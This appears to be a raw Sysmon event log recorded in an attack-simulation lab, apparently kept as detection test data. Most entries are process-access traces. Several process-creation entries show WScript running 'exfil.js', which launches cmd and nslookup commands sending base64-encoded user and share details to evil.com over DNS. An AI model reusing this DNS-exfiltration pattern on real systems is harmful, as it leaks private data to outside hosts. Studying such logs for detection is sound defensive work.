10341000x8000000000000000206467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.018{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.018{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.018{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.018{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-A342-000000005F02}1692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.018{2E1864BB-18E0-629A-6742-000000005F02}39765156C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-A342-000000005F02}1692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.021{2E1864BB-18E5-629A-A342-000000005F02}1692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlotm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.018{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB4C3AA8B9C124E551F30F22E7B1389E,SHA256=62CAF5BF670F984A8DD5CEF19843613C54644742F75EB5A512FFDB251E0F92CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.003{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgqwlze.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044795Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:26.814{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8922CFA70CE66B6C81586ACBB92FE4A,SHA256=7CEB252CA5BFE576488D7C0DDC6DD30CF34AC0B1F1D66CD596391169A815C8DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.973{2E1864BB-18E6-629A-F242-000000005F02}72723868C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-F342-000000005F02}6576C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.973{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.973{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.973{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.973{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.973{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-F342-000000005F02}6576C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.973{2E1864BB-18E6-629A-F142-000000005F02}40367372C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-F342-000000005F02}6576C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.974{2E1864BB-18E6-629A-F342-000000005F02}6576C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-F142-000000005F02}4036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqhz.tmp 2>&1 23542300x8000000000000000207210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.972{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B9A19B72D01D104F6ABD6FCA7E913B,SHA256=0F2055551798FFAA1764D713ADA62B7B00218186EE9575C2EC9D758DE05FECB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.936{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-F242-000000005F02}7272C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.936{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-F242-000000005F02}7272C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.936{2E1864BB-18E6-629A-F242-000000005F02}72723868C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-F142-000000005F02}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.920{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-F242-000000005F02}7272C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.920{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.920{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.920{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.920{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.920{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-F142-000000005F02}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.920{2E1864BB-18E0-629A-6742-000000005F02}39764212C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-F142-000000005F02}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.923{2E1864BB-18E6-629A-F142-000000005F02}4036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqhz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.904{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkuab.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.889{2E1864BB-18E6-629A-EF42-000000005F02}69846008C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-F042-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.889{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-F042-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.889{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\